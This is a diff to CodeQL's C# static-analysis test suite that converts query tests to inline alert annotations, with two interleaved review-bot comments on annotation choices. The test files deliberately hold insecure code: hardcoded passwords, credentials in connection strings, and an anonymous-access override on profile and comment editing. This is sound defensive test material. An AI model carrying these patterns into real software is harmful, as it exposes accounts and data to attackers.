diff --git a/csharp/ql/test/query-tests/Security Features/CWE-639/MVCTests/ProfileController.cs b/csharp/ql/test/query-tests/Security Features/CWE-639/MVCTests/ProfileController.cs index a41c32db6411..adb24ce0c3c9 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-639/MVCTests/ProfileController.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-639/MVCTests/ProfileController.cs @@ -11,7 +11,7 @@ public ActionResult Edit1(int profileId, string text) { // BAD: The AllowAnonymous attribute overrides the Authorize attribute on the class. [AllowAnonymous] - public ActionResult Edit2(int profileId, string text) { + public ActionResult Edit2(int profileId, string text) { // $ Alert editProfileName(profileId, text); return View(); } diff --git a/csharp/ql/test/query-tests/Security Features/CWE-639/WebFormsTests/EditComment.aspx.cs b/csharp/ql/test/query-tests/Security Features/CWE-639/WebFormsTests/EditComment.aspx.cs index 974869a0af4b..bdcf80a010fe 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-639/WebFormsTests/EditComment.aspx.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-639/WebFormsTests/EditComment.aspx.cs @@ -4,7 +4,7 @@ class EditComment : System.Web.UI.Page { // BAD - Any user can access this method. - protected void btn1_Click(object sender, EventArgs e) { + protected void btn1_Click(object sender, EventArgs e) { // $ Alert string commentId = Request.QueryString["Id"]; Comment comment = getCommentById(commentId); comment.Text = "xyz"; diff --git a/csharp/ql/test/query-tests/Security Features/CWE-639/WebFormsTests/InsecureDirectObjectReference.qlref b/csharp/ql/test/query-tests/Security Features/CWE-639/WebFormsTests/InsecureDirectObjectReference.qlref index 4756d5a76a4f..8fb76298ac58 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-639/WebFormsTests/InsecureDirectObjectReference.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-639/WebFormsTests/InsecureDirectObjectReference.qlref 
@@ -1 +1,2 @@
-Security Features/CWE-639/InsecureDirectObjectReference.ql
\ No newline at end of file
+query: Security Features/CWE-639/InsecureDirectObjectReference.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/csharp/ql/test/query-tests/Security Features/CWE-798/HardcodedConnectionString.expected b/csharp/ql/test/query-tests/Security Features/CWE-798/HardcodedConnectionString.expected
index 7de4c593e25d..299285d97174 100644
--- a/csharp/ql/test/query-tests/Security Features/CWE-798/HardcodedConnectionString.expected
+++ b/csharp/ql/test/query-tests/Security Features/CWE-798/HardcodedConnectionString.expected
@@ -1,8 +1,8 @@ +#select +| HardcodedCredentials.cs:55:48:55:63 | "Password=12345" | HardcodedCredentials.cs:55:48:55:63 | "Password=12345" | HardcodedCredentials.cs:55:48:55:63 | "Password=12345" | 'ConnectionString' property includes hard-coded credentials set in $@. | HardcodedCredentials.cs:55:30:55:64 | object creation of type SqlConnection | object creation of type SqlConnection | +| HardcodedCredentials.cs:57:49:57:63 | "User Id=12345" | HardcodedCredentials.cs:57:49:57:63 | "User Id=12345" | HardcodedCredentials.cs:57:49:57:63 | "User Id=12345" | 'ConnectionString' property includes hard-coded credentials set in $@. | HardcodedCredentials.cs:57:31:57:64 | object creation of type SqlConnection | object creation of type SqlConnection | edges nodes | HardcodedCredentials.cs:55:48:55:63 | "Password=12345" | semmle.label | "Password=12345" | | HardcodedCredentials.cs:57:49:57:63 | "User Id=12345" | semmle.label | "User Id=12345" | subpaths -#select -| HardcodedCredentials.cs:55:48:55:63 | "Password=12345" | HardcodedCredentials.cs:55:48:55:63 | "Password=12345" | HardcodedCredentials.cs:55:48:55:63 | "Password=12345" | 'ConnectionString' property includes hard-coded credentials set in $@. | HardcodedCredentials.cs:55:30:55:64 | object creation of type SqlConnection | object creation of type SqlConnection | -| HardcodedCredentials.cs:57:49:57:63 | "User Id=12345" | HardcodedCredentials.cs:57:49:57:63 | "User Id=12345" | HardcodedCredentials.cs:57:49:57:63 | "User Id=12345" | 'ConnectionString' property includes hard-coded credentials set in $@. | HardcodedCredentials.cs:57:31:57:64 | object creation of type SqlConnection | object creation of type SqlConnection | diff --git a/csharp/ql/test/query-tests/Security Features/CWE-798/HardcodedConnectionString.qlref b/csharp/ql/test/query-tests/Security Features/CWE-798/HardcodedConnectionString.qlref index d240503b7731..da05cee17d43 100644 
--- a/csharp/ql/test/query-tests/Security Features/CWE-798/HardcodedConnectionString.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-798/HardcodedConnectionString.qlref @@ -1 +1,2 @@ -Security Features/CWE-798/HardcodedConnectionString.ql \ No newline at end of file +query: Security Features/CWE-798/HardcodedConnectionString.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-798/HardcodedCredentials.cs b/csharp/ql/test/query-tests/Security Features/CWE-798/HardcodedCredentials.cs index 840d65b19653..4a9bada259b2 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-798/HardcodedCredentials.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-798/HardcodedCredentials.cs @@ -13,7 +13,7 @@ public void ProcessRequest(HttpContext ctx) string password = ctx.Request.QueryString["password"]; // BAD: Inbound authentication made by comparison to string literal - if (password == "myPa55word") + if (password == "myPa55word") // $ Alert[cs/hardcoded-credentials] { ctx.Response.Redirect("login"); } @@ -29,7 +29,7 @@ public void ProcessRequest(HttpContext ctx) // BAD: Create a membership user with hardcoded username MembershipUser user = new MembershipUser( providerName: "provider", - name: "username", + name: "username", // $ Alert[cs/hardcoded-credentials] providerUserKey: "username", email: "foo@bar.com", passwordQuestion: "Hardcoded question.", 
@@ -43,18 +43,18 @@ public void ProcessRequest(HttpContext ctx) lastLockoutDate: DateTime.Now ); // BAD: Set the password to a hardcoded string literal - user.ChangePassword(password, "myNewPa55word"); + user.ChangePassword(password, "myNewPa55word"); // $ Alert[cs/hardcoded-credentials] - byte[] rawCertData = new byte[] { 0x20, 0x20, 0x20 }; + byte[] rawCertData = new byte[] { 0x20, 0x20, 0x20 }; // $ Alert[cs/hardcoded-credentials] // BAD: Passing a literal certificate and password to an X509 certificate constructor X509Certificate2 cert = new X509Certificate2( - rawCertData, - "myPa55word"); + rawCertData, // $ Sink[cs/hardcoded-credentials] + "myPa55word"); // $ Alert[cs/hardcoded-credentials] // BAD: Passing literal Password to connection string - SqlConnection conn = new SqlConnection("Password=12345"); + SqlConnection conn = new SqlConnection("Password=12345"); // $ Alert[cs/hardcoded-connection-string-credentials] // BAD: Passing literal User Id to connection string - SqlConnection conn2 = new SqlConnection("User Id=12345"); + SqlConnection conn2 = new SqlConnection("User Id=12345"); // $ Alert[cs/hardcoded-connection-string-credentials] // GOOD: Password is not specified literally SqlConnection conn3 = new SqlConnection("Password=" + LoadPasswordFromSecretConfig() + ";"); @@ -72,7 +72,7 @@ public void ProcessRequest(HttpContext ctx) conn = new SqlConnection($"Password={LoadPasswordFromSecretConfig()}"); // BAD: Hard-coded user - Membership.CreateUser("myusername", "mypassword"); + Membership.CreateUser("myusername", "mypassword"); // $ Alert[cs/hardcoded-credentials] var identityOptions = new IdentityOptions { diff --git a/csharp/ql/test/query-tests/Security Features/CWE-798/HardcodedCredentials.expected b/csharp/ql/test/query-tests/Security Features/CWE-798/HardcodedCredentials.expected index f6768445fe8e..36abe5531f04 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-798/HardcodedCredentials.expected 
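Review bot: The single `// $ Alert[cs/hardcoded-credentials]` added on the `Membership.CreateUser("myusername", "mypassword");` line in the `@@ -72,7 +72,7 @@` hunk stands for two separate findings: HardcodedCredentials.expected lists one row for the username argument (75:31) and one for the password argument (75:45). The annotation sits on the line as a whole, so it cannot show which argument is expected to be flagged, and it would presumably still be satisfied if only one of the two were reported; the two `.expected` rows remain the only check that both are found. Putting each argument on its own line, `"myusername", // $ Alert[cs/hardcoded-credentials]` and `"mypassword"); // $ Alert[cs/hardcoded-credentials]`, would make the expectation explicit, at the cost of renumbering the later rows in the expected file. ProcessRequest starts and ends outside this hunk.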
+++ b/csharp/ql/test/query-tests/Security Features/CWE-798/HardcodedCredentials.expected 
@@ -1,3 +1,12 @@ +#select +| HardcodedCredentials.cs:16:25:16:36 | "myPa55word" | HardcodedCredentials.cs:16:25:16:36 | "myPa55word" | HardcodedCredentials.cs:16:25:16:36 | "myPa55word" | The hard-coded value "myPa55word" flows to $@ which is compared against $@. | HardcodedCredentials.cs:16:25:16:36 | "myPa55word" | "myPa55word" | HardcodedCredentials.cs:16:13:16:20 | access to local variable password | access to local variable password | +| HardcodedCredentials.cs:32:19:32:28 | "username" | HardcodedCredentials.cs:32:19:32:28 | "username" | HardcodedCredentials.cs:32:19:32:28 | "username" | The hard-coded value "username" flows to the $@ parameter in $@. | HardcodedCredentials.cs:32:19:32:28 | "username" | name | HardcodedCredentials.cs:30:31:44:13 | object creation of type MembershipUser | object creation of type MembershipUser | +| HardcodedCredentials.cs:46:39:46:53 | "myNewPa55word" | HardcodedCredentials.cs:46:39:46:53 | "myNewPa55word" | HardcodedCredentials.cs:46:39:46:53 | "myNewPa55word" | The hard-coded value "myNewPa55word" flows to the $@ parameter in $@. | HardcodedCredentials.cs:46:39:46:53 | "myNewPa55word" | newPassword | HardcodedCredentials.cs:46:9:46:54 | call to method ChangePassword | call to method ChangePassword | +| HardcodedCredentials.cs:48:30:48:60 | array creation of type Byte[] | HardcodedCredentials.cs:48:30:48:60 | array creation of type Byte[] : Byte[] | HardcodedCredentials.cs:51:13:51:23 | access to local variable rawCertData | This hard-coded value flows to the $@ parameter in $@. | HardcodedCredentials.cs:51:13:51:23 | access to local variable rawCertData | rawData | HardcodedCredentials.cs:50:33:52:25 | object creation of type X509Certificate2 | object creation of type X509Certificate2 | +| HardcodedCredentials.cs:52:13:52:24 | "myPa55word" | HardcodedCredentials.cs:52:13:52:24 | "myPa55word" | HardcodedCredentials.cs:52:13:52:24 | "myPa55word" | The hard-coded value "myPa55word" flows to the $@ parameter in $@. 
| HardcodedCredentials.cs:52:13:52:24 | "myPa55word" | password | HardcodedCredentials.cs:50:33:52:25 | object creation of type X509Certificate2 | object creation of type X509Certificate2 | +| HardcodedCredentials.cs:75:31:75:42 | "myusername" | HardcodedCredentials.cs:75:31:75:42 | "myusername" | HardcodedCredentials.cs:75:31:75:42 | "myusername" | The hard-coded value "myusername" flows to the $@ parameter in $@. | HardcodedCredentials.cs:75:31:75:42 | "myusername" | username | HardcodedCredentials.cs:75:9:75:57 | call to method CreateUser | call to method CreateUser | +| HardcodedCredentials.cs:75:45:75:56 | "mypassword" | HardcodedCredentials.cs:75:45:75:56 | "mypassword" | HardcodedCredentials.cs:75:45:75:56 | "mypassword" | The hard-coded value "mypassword" flows to the $@ parameter in $@. | HardcodedCredentials.cs:75:45:75:56 | "mypassword" | password | HardcodedCredentials.cs:75:9:75:57 | call to method CreateUser | call to method CreateUser | +| TestHardcodedCredentials.cs:26:19:26:28 | "username" | TestHardcodedCredentials.cs:26:19:26:28 | "username" | TestHardcodedCredentials.cs:26:19:26:28 | "username" | The hard-coded value "username" flows to the $@ parameter in $@. | TestHardcodedCredentials.cs:26:19:26:28 | "username" | name | TestHardcodedCredentials.cs:24:31:38:13 | object creation of type MembershipUser | object creation of type MembershipUser | edges | HardcodedCredentials.cs:48:16:48:26 | access to local variable rawCertData : Byte[] | HardcodedCredentials.cs:51:13:51:23 | access to local variable rawCertData | provenance | | | HardcodedCredentials.cs:48:30:48:60 | array creation of type Byte[] : Byte[] | HardcodedCredentials.cs:48:16:48:26 | access to local variable rawCertData : Byte[] | provenance | | 
@@ -15,12 +24,3 @@ nodes | TestHardcodedCredentials.cs:21:45:21:56 | "mypassword" | semmle.label | "mypassword" | | TestHardcodedCredentials.cs:26:19:26:28 | "username" | semmle.label | "username" | subpaths -#select -| HardcodedCredentials.cs:16:25:16:36 | "myPa55word" | HardcodedCredentials.cs:16:25:16:36 | "myPa55word" | HardcodedCredentials.cs:16:25:16:36 | "myPa55word" | The hard-coded value "myPa55word" flows to $@ which is compared against $@. | HardcodedCredentials.cs:16:25:16:36 | "myPa55word" | "myPa55word" | HardcodedCredentials.cs:16:13:16:20 | access to local variable password | access to local variable password | -| HardcodedCredentials.cs:32:19:32:28 | "username" | HardcodedCredentials.cs:32:19:32:28 | "username" | HardcodedCredentials.cs:32:19:32:28 | "username" | The hard-coded value "username" flows to the $@ parameter in $@. | HardcodedCredentials.cs:32:19:32:28 | "username" | name | HardcodedCredentials.cs:30:31:44:13 | object creation of type MembershipUser | object creation of type MembershipUser | -| HardcodedCredentials.cs:46:39:46:53 | "myNewPa55word" | HardcodedCredentials.cs:46:39:46:53 | "myNewPa55word" | HardcodedCredentials.cs:46:39:46:53 | "myNewPa55word" | The hard-coded value "myNewPa55word" flows to the $@ parameter in $@. | HardcodedCredentials.cs:46:39:46:53 | "myNewPa55word" | newPassword | HardcodedCredentials.cs:46:9:46:54 | call to method ChangePassword | call to method ChangePassword | -| HardcodedCredentials.cs:48:30:48:60 | array creation of type Byte[] | HardcodedCredentials.cs:48:30:48:60 | array creation of type Byte[] : Byte[] | HardcodedCredentials.cs:51:13:51:23 | access to local variable rawCertData | This hard-coded value flows to the $@ parameter in $@. 
| HardcodedCredentials.cs:51:13:51:23 | access to local variable rawCertData | rawData | HardcodedCredentials.cs:50:33:52:25 | object creation of type X509Certificate2 | object creation of type X509Certificate2 | -| HardcodedCredentials.cs:52:13:52:24 | "myPa55word" | HardcodedCredentials.cs:52:13:52:24 | "myPa55word" | HardcodedCredentials.cs:52:13:52:24 | "myPa55word" | The hard-coded value "myPa55word" flows to the $@ parameter in $@. | HardcodedCredentials.cs:52:13:52:24 | "myPa55word" | password | HardcodedCredentials.cs:50:33:52:25 | object creation of type X509Certificate2 | object creation of type X509Certificate2 | -| HardcodedCredentials.cs:75:31:75:42 | "myusername" | HardcodedCredentials.cs:75:31:75:42 | "myusername" | HardcodedCredentials.cs:75:31:75:42 | "myusername" | The hard-coded value "myusername" flows to the $@ parameter in $@. | HardcodedCredentials.cs:75:31:75:42 | "myusername" | username | HardcodedCredentials.cs:75:9:75:57 | call to method CreateUser | call to method CreateUser | -| HardcodedCredentials.cs:75:45:75:56 | "mypassword" | HardcodedCredentials.cs:75:45:75:56 | "mypassword" | HardcodedCredentials.cs:75:45:75:56 | "mypassword" | The hard-coded value "mypassword" flows to the $@ parameter in $@. | HardcodedCredentials.cs:75:45:75:56 | "mypassword" | password | HardcodedCredentials.cs:75:9:75:57 | call to method CreateUser | call to method CreateUser | -| TestHardcodedCredentials.cs:26:19:26:28 | "username" | TestHardcodedCredentials.cs:26:19:26:28 | "username" | TestHardcodedCredentials.cs:26:19:26:28 | "username" | The hard-coded value "username" flows to the $@ parameter in $@. | TestHardcodedCredentials.cs:26:19:26:28 | "username" | name | TestHardcodedCredentials.cs:24:31:38:13 | object creation of type MembershipUser | object creation of type MembershipUser | 
diff --git a/csharp/ql/test/query-tests/Security Features/CWE-798/HardcodedCredentials.qlref b/csharp/ql/test/query-tests/Security Features/CWE-798/HardcodedCredentials.qlref index ce8fa7f9b286..d4792bd2fa24 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-798/HardcodedCredentials.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-798/HardcodedCredentials.qlref @@ -1 +1,2 @@ -Security Features/CWE-798/HardcodedCredentials.ql \ No newline at end of file +query: Security Features/CWE-798/HardcodedCredentials.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-798/TestHardcodedCredentials.cs b/csharp/ql/test/query-tests/Security Features/CWE-798/TestHardcodedCredentials.cs index fa6d6f2b98af..997c1b7db795 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-798/TestHardcodedCredentials.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-798/TestHardcodedCredentials.cs @@ -23,7 +23,7 @@ public void TestUnsafe() // BAD: Create a membership user with hardcoded username MembershipUser user = new MembershipUser( providerName: "provider", - name: "username", + name: "username", // $ Alert[cs/hardcoded-credentials] providerUserKey: "username", email: "foo@bar.com", passwordQuestion: "Hardcoded question.", diff --git a/csharp/ql/test/query-tests/Telemetry/LibraryUsage/ExternalLibraryUsage.qlref b/csharp/ql/test/query-tests/Telemetry/LibraryUsage/ExternalLibraryUsage.qlref index 98a6202f3eb5..918fe540c3bc 100644 --- a/csharp/ql/test/query-tests/Telemetry/LibraryUsage/ExternalLibraryUsage.qlref +++ b/csharp/ql/test/query-tests/Telemetry/LibraryUsage/ExternalLibraryUsage.qlref @@ -1 +1 @@ -Telemetry/ExternalLibraryUsage.ql +query: Telemetry/ExternalLibraryUsage.ql diff --git a/csharp/ql/test/query-tests/Telemetry/LibraryUsage/SupportedExternalTaint.qlref b/csharp/ql/test/query-tests/Telemetry/LibraryUsage/SupportedExternalTaint.qlref index ef9ddfadc00d..a8f8f4965efe 100644 
--- a/csharp/ql/test/query-tests/Telemetry/LibraryUsage/SupportedExternalTaint.qlref
+++ b/csharp/ql/test/query-tests/Telemetry/LibraryUsage/SupportedExternalTaint.qlref
@@ -1 +1 @@
-Telemetry/SupportedExternalTaint.ql
+query: Telemetry/SupportedExternalTaint.ql
diff --git a/csharp/ql/test/query-tests/Telemetry/LibraryUsage/UnsupportedExternalAPIs.qlref b/csharp/ql/test/query-tests/Telemetry/LibraryUsage/UnsupportedExternalAPIs.qlref
index b89f0a48e2e6..da704d4cbbe9 100644
--- a/csharp/ql/test/query-tests/Telemetry/LibraryUsage/UnsupportedExternalAPIs.qlref
+++ b/csharp/ql/test/query-tests/Telemetry/LibraryUsage/UnsupportedExternalAPIs.qlref
@@ -1 +1 @@
-Telemetry/UnsupportedExternalAPIs.ql
+query: Telemetry/UnsupportedExternalAPIs.ql
diff --git a/csharp/ql/test/query-tests/Telemetry/SupportedExternalApis/SupportedExternalApis.qlref b/csharp/ql/test/query-tests/Telemetry/SupportedExternalApis/SupportedExternalApis.qlref
index 2e12499cf62b..f3e231b8a7aa 100644
--- a/csharp/ql/test/query-tests/Telemetry/SupportedExternalApis/SupportedExternalApis.qlref
+++ b/csharp/ql/test/query-tests/Telemetry/SupportedExternalApis/SupportedExternalApis.qlref
@@ -1 +1 @@
-Telemetry/SupportedExternalApis.ql
+query: Telemetry/SupportedExternalApis.ql
diff --git a/csharp/ql/test/query-tests/Telemetry/SupportedExternalSinks/SupportedExternalSinks.qlref b/csharp/ql/test/query-tests/Telemetry/SupportedExternalSinks/SupportedExternalSinks.qlref
index e8bd57fad506..d454ef226b9d 100644
--- a/csharp/ql/test/query-tests/Telemetry/SupportedExternalSinks/SupportedExternalSinks.qlref
+++ b/csharp/ql/test/query-tests/Telemetry/SupportedExternalSinks/SupportedExternalSinks.qlref
@@ -1 +1 @@
-Telemetry/SupportedExternalSinks.ql
\ No newline at end of file
+query: Telemetry/SupportedExternalSinks.ql
diff --git a/csharp/ql/test/query-tests/Telemetry/SupportedExternalSources/SupportedExternalSources.qlref b/csharp/ql/test/query-tests/Telemetry/SupportedExternalSources/SupportedExternalSources.qlref index c6819c7775f4..f6f3f1b972d1 100644 --- a/csharp/ql/test/query-tests/Telemetry/SupportedExternalSources/SupportedExternalSources.qlref +++ b/csharp/ql/test/query-tests/Telemetry/SupportedExternalSources/SupportedExternalSources.qlref @@ -1 +1 @@ -Telemetry/SupportedExternalSources.ql +query: Telemetry/SupportedExternalSources.ql diff --git a/csharp/ql/test/query-tests/UnusedPropertyValue/UnusedPropertyValue.cs b/csharp/ql/test/query-tests/UnusedPropertyValue/UnusedPropertyValue.cs index aabe43f2258d..bb6bf7e264bf 100644 --- a/csharp/ql/test/query-tests/UnusedPropertyValue/UnusedPropertyValue.cs +++ b/csharp/ql/test/query-tests/UnusedPropertyValue/UnusedPropertyValue.cs @@ -6,12 +6,12 @@ class Program bool Prop1 { - set { x = true; } // BAD + set { x = true; } // BAD // $ Alert } bool Prop2 { - set { } // BAD + set { } // BAD // $ Alert } bool Prop3 @@ -55,7 +55,7 @@ class C3 : C2 { public bool Prop1 { - set { } // BAD: not override + set { } // BAD: not override // $ Alert } public override bool Prop2 diff --git a/csharp/ql/test/query-tests/UnusedPropertyValue/UnusedPropertyValue.qlref b/csharp/ql/test/query-tests/UnusedPropertyValue/UnusedPropertyValue.qlref index 199133fb534c..ca84e54c8278 100644 --- a/csharp/ql/test/query-tests/UnusedPropertyValue/UnusedPropertyValue.qlref +++ b/csharp/ql/test/query-tests/UnusedPropertyValue/UnusedPropertyValue.qlref @@ -1 +1,2 @@ -Language Abuse/UnusedPropertyValue.ql \ No newline at end of file +query: Language Abuse/UnusedPropertyValue.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/UseBraces/UseBraces.cs b/csharp/ql/test/query-tests/UseBraces/UseBraces.cs index c6036255062d..d5abf8fb90cc 100644 --- a/csharp/ql/test/query-tests/UseBraces/UseBraces.cs 
+++ b/csharp/ql/test/query-tests/UseBraces/UseBraces.cs @@ -29,7 +29,7 @@ static void Main(string[] args) g(); // BAD if (1 == 1) - f(); g(); // BAD + f(); g(); // BAD // $ Alert // If-then-else statement @@ -63,7 +63,7 @@ static void Main(string[] args) f(); } else - f(); g(); // BAD + f(); g(); // BAD // $ Alert // While statement @@ -83,7 +83,7 @@ static void Main(string[] args) g(); // GOOD while (x > 1) - f(); g(); // BAD + f(); g(); // BAD // $ Alert while (x > 1) if (x != null) x = 1; @@ -111,7 +111,7 @@ static void Main(string[] args) g(); // BAD for (int i = 0; i < 10; ++i) - f(); g(); // BAD + f(); g(); // BAD // $ Alert // Foreach statement @@ -130,7 +130,7 @@ static void Main(string[] args) g(); // BAD foreach (var b in branches) - f(); g(); // BAD + f(); g(); // BAD // $ Alert // Nested ifs if (x > 1) diff --git a/csharp/ql/test/query-tests/UseBraces/UseBraces.qlref b/csharp/ql/test/query-tests/UseBraces/UseBraces.qlref index 5d1d4a063882..e89389461d72 100644 --- a/csharp/ql/test/query-tests/UseBraces/UseBraces.qlref +++ b/csharp/ql/test/query-tests/UseBraces/UseBraces.qlref @@ -1 +1,2 @@ -Likely Bugs/Statements/UseBraces.ql +query: Likely Bugs/Statements/UseBraces.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Useless Code/PointlessForwardingMethod/PointlessForwardingMethod.cs b/csharp/ql/test/query-tests/Useless Code/PointlessForwardingMethod/PointlessForwardingMethod.cs index 096372e40985..04a2b3b68cad 100644 --- a/csharp/ql/test/query-tests/Useless Code/PointlessForwardingMethod/PointlessForwardingMethod.cs +++ b/csharp/ql/test/query-tests/Useless Code/PointlessForwardingMethod/PointlessForwardingMethod.cs @@ -8,7 +8,7 @@ class C : I public void f(int x) { } // BAD: This method is a forwarder - public void f() + public void f() // $ Alert { f(1); } @@ -38,7 +38,7 @@ void h() { } void i() { } // BAD: Forwarding method - void i(int a) + void i(int a) // $ Alert { i(); } 
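Review bot: In UseBraces.cs the context lines `g(); // BAD` in the hunks at -29, -111 and -130 carry no inline expectation, while the only lines this change annotates are the same-line `f(); g(); // BAD` cases. Now that UseBraces.qlref runs `utils/test/InlineExpectationsTestQuery.ql`, a `// BAD` comment without `// $ Alert` reads either as a result the query is expected to miss or as an alert that is reported on a different line; the hunks do not show which. If the query does not report those statements, mark them `g(); // BAD // $ MISSING: Alert` so the prose marker and the checked expectation agree. Main starts and ends outside every one of these hunks.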
diff --git a/csharp/ql/test/query-tests/Useless Code/PointlessForwardingMethod/PointlessForwardingMethod.qlref b/csharp/ql/test/query-tests/Useless Code/PointlessForwardingMethod/PointlessForwardingMethod.qlref index 2e42cbc75022..435314fa3738 100644 --- a/csharp/ql/test/query-tests/Useless Code/PointlessForwardingMethod/PointlessForwardingMethod.qlref +++ b/csharp/ql/test/query-tests/Useless Code/PointlessForwardingMethod/PointlessForwardingMethod.qlref @@ -1 +1,2 @@ -Useless code/PointlessForwardingMethod.ql +query: Useless code/PointlessForwardingMethod.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/WriteOnlyContainer/WriteOnlyContainer.cs b/csharp/ql/test/query-tests/WriteOnlyContainer/WriteOnlyContainer.cs index 6d870cad08bf..67e67ad472b9 100644 --- a/csharp/ql/test/query-tests/WriteOnlyContainer/WriteOnlyContainer.cs +++ b/csharp/ql/test/query-tests/WriteOnlyContainer/WriteOnlyContainer.cs @@ -7,7 +7,7 @@ public class ContainerTest // Test 1: Variable scopes // Test 1a: Private field - private IList c1a = new List { 1, 2 }; // BAD: private + private IList c1a = new List { 1, 2 }; // BAD: private // $ Alert // Test 1b: protected field protected IList c1b = new List { 1, 2 }; // GOOD: protected @@ -16,7 +16,7 @@ public class ContainerTest public IList c1c = new List { 1, 2 }; // GOOD: public // Test 1d: internal field - internal IList c1d = new List { 1, 2 }; // BAD: internal + internal IList c1d = new List { 1, 2 }; // BAD: internal // $ Alert void TestScopes() { @@ -26,7 +26,7 @@ void TestScopes() c1d.Add(4); // Test 1e: Local variable - IList c1e = new List { 1, 2 }; // BAD: local + IList c1e = new List { 1, 2 }; // BAD: local // $ Alert c1e.Add(5); } 
@@ -35,7 +35,7 @@ void TestScopes() void TestMethodNames() { // Test 2a: Writeonly method names - IList c2a = new List { 1, 2 }; // BAD: writeonly methods + IList c2a = new List { 1, 2 }; // BAD: writeonly methods // $ Alert c2a.Add(1); c2a.Clear(); c2a.Insert(1, 2); @@ -47,14 +47,14 @@ void TestMethodNames() bool b = c2b.Contains(1); // Test 2c: Other method names - var c2c = new Stack(); // BAD + var c2c = new Stack(); // BAD // $ Alert c2c.Push(1); - var c2d = new BitArray(10); // BAD + var c2d = new BitArray(10); // BAD // $ Alert c2d.Set(1, true); c2d.SetAll(false); - var c2j = new LinkedList(); // BAD + var c2j = new LinkedList(); // BAD // $ Alert c2j.AddFirst(1); c2j.AddLast(2); c2j.RemoveFirst(); @@ -100,7 +100,7 @@ IList this[int i] void TestAccessTypes() { // 3a: Unused - IList c3a = new List { 4, 5 }; // BAD + IList c3a = new List { 4, 5 }; // BAD // $ Alert // 3b: Pass to function IList c3b = new List { }; // GOOD: used @@ -115,7 +115,7 @@ void TestAccessTypes() // Test 4: Initialization type - private IList c4a; // BAD: even though uninitialized + private IList c4a; // BAD: even though uninitialized // $ Alert void TestInitializationTypes() { @@ -123,11 +123,11 @@ void TestInitializationTypes() c4a.Add(1); // Test 4b: Constructed from new - var c4b = new List(); // BAD + var c4b = new List(); // BAD // $ Alert c4b.Add(1); // Test 4c: List initialized - var c4c = new List { 2, 3, 4 }; // BAD + var c4c = new List { 2, 3, 4 }; // BAD // $ Alert c4c.Add(1); // Test 4d: Constructed from other expression @@ -147,7 +147,7 @@ void TestInitializationTypes() void TestAssignment() { // Assigned from new container - IList c5a; // BAD + IList c5a; // BAD // $ Alert c5a = new List(); c5a.Add(1); @@ -162,7 +162,7 @@ void TestAssignment() c5d = c5c; // Assigned in an expression somewhere - IList c5e = new List(); // BAD: assigned in expr + IList c5e = new List(); // BAD: assigned in expr // $ Alert for (int i = 0; i < 10; c5e = new List(), ++i) c5e.Add(1); 
@@ -183,67 +183,67 @@ void TestCollections() var c6a = new NonCollection(); // GOOD: not a collection c6a.Add(1); - var c6b = new ArrayList(); // BAD + var c6b = new ArrayList(); // BAD // $ Alert c6b.Add(1); - var c6c = new BitArray(32); // BAD + var c6c = new BitArray(32); // BAD // $ Alert c6c.SetAll(true); - var c6d = new Hashtable(); // BAD + var c6d = new Hashtable(); // BAD // $ Alert c6d.Add(1, 2); - var c6e = new Queue(); // BAD + var c6e = new Queue(); // BAD // $ Alert c6e.Enqueue(1); - var c6f = new SortedList(); // BAD + var c6f = new SortedList(); // BAD // $ Alert c6f.Add(1, 2); - var c6g = new Stack(); // BAD + var c6g = new Stack(); // BAD // $ Alert c6g.Push(1); - var c6h = new Dictionary(); // BAD + var c6h = new Dictionary(); // BAD // $ Alert c6h.Add(1, 2); - var c6i = new HashSet(); // BAD + var c6i = new HashSet(); // BAD // $ Alert c6i.Add(1); - var c6j = new LinkedList(); // BAD + var c6j = new LinkedList(); // BAD // $ Alert c6j.AddFirst(1); - var c6k = new List(); // BAD + var c6k = new List(); // BAD // $ Alert c6k.Add(1); - var c6l = new Queue(); // BAD + var c6l = new Queue(); // BAD // $ Alert c6l.Enqueue(1); - var c6m = new SortedDictionary(); // BAD + var c6m = new SortedDictionary(); // BAD // $ Alert c6m.Add(1, 2); - var c6n = new SortedList(); // BAD + var c6n = new SortedList(); // BAD // $ Alert c6n.Add(1, 2); - var c6o = new SortedDictionary(); // BAD + var c6o = new SortedDictionary(); // BAD // $ Alert c6o.Add(1, 2); - var c6p = new SortedSet(); // BAD + var c6p = new SortedSet(); // BAD // $ Alert c6p.Add(1); - var c6q = new Stack(); // BAD + var c6q = new Stack(); // BAD // $ Alert c6q.Push(1); - ICollection c6u = new List(); // BAD + ICollection c6u = new List(); // BAD // $ Alert c6u.Add(1); - IDictionary c6v = new Dictionary(); // BAD + IDictionary c6v = new Dictionary(); // BAD // $ Alert c6v.Add(1, 2); IEnumerable c6w = new List(); // GOOD c6w.GetEnumerator(); - IList c6x = new List(); // BAD + IList c6x = new List(); 
